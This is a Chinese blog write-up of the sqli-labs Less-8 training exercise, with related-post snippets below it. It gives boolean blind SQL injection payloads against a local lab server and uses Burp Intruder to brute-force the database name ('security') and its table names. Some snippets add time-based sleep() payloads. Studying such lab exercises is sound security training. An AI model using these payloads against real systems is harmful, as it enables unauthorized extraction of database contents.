sql-labs-less8 基于盲注的boolan注入全过程

最新推荐文章于 2024-07-23 20:15:36 发布
最新推荐文章于 2024-07-23 20:15:36 发布
阅读量252 收藏
点赞数 1
分类专栏: sql注入 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mysmycbx/article/details/118460883
版权

sql-labs-less8 GET - Blind - Boolan Based - Single Quotes

step0 准备

http://192.168.139.138/sqli-labs/Less-8/

HackBar

MySQL

Apache

step1 测试

首先我们假装不知道后台的代码。其中sql查询语句为sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1
result:
yes

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1'
result:
no

这里我们无法看到后台所返回的结果,所以这里不可以使用union注入,所以这里我们使用boolan注入法,第一步我们先判断数据库名的长度,

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and length(database())>=5 -- +
result:
yes

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and length(database())>=10 -- +
result:
no

所以数据库长度位于5~9之间,我们可以用二分法测试,下一个是7。

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and length(database())>=7 -- +
result:
yes
----------------------------7~9-----------------------
payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and length(database())>=8 -- +
result:
yes
----------------------------8~9----------------------
payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and length(database())>=9 -- +
result:
no

所以我们知道了数据库名字长度为8。接下来我们通过substr()函数,与limit函数不同,是从1下标开始的。数据库名的范围一般在a~z, 0~9之内,可能还有一些特殊字符,这里的字母不区分大小写。这里八个有点多,我们采用burp抓包来爆破一下。

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and substr(database(),1,1)='a' -- +这里的1,1表示从第一个字符开始,往后第一个字符

在这里插入图片描述

右击发到 intruder模块,send to intruder

在这里插入图片描述

在这里插入图片描述

在图中,两个位置添加$注入符号,然后选择 攻击种类为Cluster bomb。

其中payload 1选择1~8,payload 2选择a-z,0-9

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

如上图得到结果:数据库名为security,下一步爆表名。

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='a' --+

方法和上面一样。在这里插入图片描述

得到的结果导入到excel表格中。我们利用表格排序,得到以下结果

在这里插入图片描述

step2 结论

组合一下就是emails,referers,uagents,users

下面的操作就和上面的很类似了,在这里就不一一演示了。

TryHardToKeep
关注
专栏目录
sqli-labs Less-8(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 626
布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔盲注之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
最详细的讲解 让你最快通关Less-9-Less-10/ --时间盲注http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注
m0_58883317的博客
04-17 5537
http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注 判断注入点 http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) 根据页面显示我们可以知道使用联合注入是不可行的。页面无论对错都只显示you are in所以我们选择和less-9一样
sqli-labs(less8)
m0_68980215的博客
07-08 270
lesson8
sql-labs Less8 盲注
为之的博客
06-24 420
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import requests #数据库长度 import time url = "http://localhost/sqli-labs-master/Less-8" # 0' or length(database())=8 --+ len = -1 for i in range(1,100): param = "0' or length(database())=" + str(i) + "#" .
sqlilabs—less8
一个普普通通的博客
03-24 825
sqlilabs—less8
Sqli-labs靶场笔记5(Less8 布尔型注入
m0_52233414的博客
04-04 221
Less8跟之前的Less5,Less6一样,也可以用布尔型注入来做,我们简单的测试就可以知道闭合方式也是’,所以关于原理部分就不写了,有疑惑的可以直接看我前面的。,下面直接给出具体payload。
Sqli-labs Less8-Less16
最新发布
beiweixiaotian66的博客
07-23 750
一丢丢小练习
sqli-labs Less-5(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 672
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入sqli-labs Less-2(联合注入、整形型注入sqli-labs Less-3(联合注入、字符型注入sqli-labs Less-4(联合注入、字符型注入sqli-labs Less-5(利用extractvalue进行报错注入sqli-labs Less-5(双注入) 布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
sqli-labs Less8~10 布尔盲注、时间盲注(无报错回显)
双子叶mm的博客
10-22 792
1. Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注) 判断是否存在数字型或字符型注入: 输入1,页面显示正常: 输入1’ and 1=1时显示正常: 输入1’ and 1=2时显示异常: 说明存在字符型的SQL盲注。 Less-8和Less-5的区别在于,Less-8对报错语句进行了注释,所以无法使用显错式注入,只能用盲注。 1.猜解数据库名长度: 输入1' and length(database()) = 5 --+,
sqli-labs Less-1、Less-9\Less-15 python脚本
ChamZhiZe的博客
12-21 1283
虽然这个很简单,但是还是写个脚本跑一下 Less-1 from http.client import PROCESSING, responses from re import I, T from typing import FrozenSet from bs4.dammit import xml_encoding from bs4.element import ProcessingInstruction import requests import urllib.request from colorama
sqli-labs less8-10
sopora的博客
10-09 405
LESS 8 基于布尔的盲注 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注盲注分为好几种,本关采用基于布尔的盲注 盲注相关函数: mid(column_name,start[,length]) select mid(12345,2,3); +-----------...
sqli-labs (less-8)
kukudeshuo的博客
03-08 255
sqli-labs (less-8) 输入 http://127.0.0.1/sql1/Less-8/?id=1 #回显正常 http://127.0.0.1/sql1/Less-8/?id=1' #没有任何回显 http://127.0.0.1/sql1/Less-8/?id=1'--+ #回显正常 这里我们可以判断为字符型注入,但是他既没有具体错误回显也没有数据显示,所以这里我们只能选择使用Boolean盲注 http://127.0.0.1/sql1/Less-8/?id=1' and len
SQLI-Lab】-Less8
xinyue9966的博客
01-26 371
Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 和第7题思路过程一样,不过不需要写入、闭合字段后,开始用burp suite爆,具体过程不再细讲。 盲注爆库长度payload
网络安全]sqli-labs Less-8 解题详析
等风来
07-23 2675
以上为[网络安全]sqli-labs Less-8 解题详析,后续将分享[网络安全]sqli-labs Less-9 解题详析[网络安全]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
Sqli-labs 复习 Less08 布尔型sql盲注 - GET
kevinhanser
08-11 441
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 布尔型 sql 盲注 Less-8 布尔型sql盲注-单引号 测试 payload ?id=1'or 1=1--+ 四种方法讲解: left() ascii()、substr() regexp ord()、mid() 其中: left(strin...
SQLi-Labs Less7-Less10
KRDecad3的博客
11-13 658
Less-7-GET-Dump into outfile-String 考查into outfile写入文件 输入id=1 输入id=1'报错 输入id=1"不报错,说明是单引号 输入id=1'--+报错,那么再试试id=1')--+还报错,再试试id=1'))--+正常,由此判断查询语句的参数是(('$_GET[id]'))的形式。 使用into outfile写入一句话: 输入id=-...
LESS-8 ~LESS-12
qq_44598397的博客
03-20 563
LESS-8 此处不同于第5关的是:这里的报错被注释掉了,故不能用报错注入,可以延时注入和布尔注入 延时注入: http://127.0.0.1/sqlilabs/Less-8/?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+ 盲注: http://127.0.0.1/sqlilabs/Less-8/?id=1' and ...
SQL注入---基于boolean盲注
Ethan024的博客
03-31 266
SQL注入—基于boolean盲注 实验平台: 皮卡丘靶场—盲注(base on boolean) 实验原理: 查看当前数据库名称:select database(); 将数据库名称用substr()取值,从第1个字符开始,取一个字符:select substr(database(), 1, 1); 将取出的值转换成ASCII码:select ascii(substr(database(),1,1)); 对转换的值进行比较:select ascii(substr(database(),1,1)) &
sqli-labs 第八关 较详细通关解释】
m0_71635484的博客
02-17 943
sqli-labs第八关详解
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值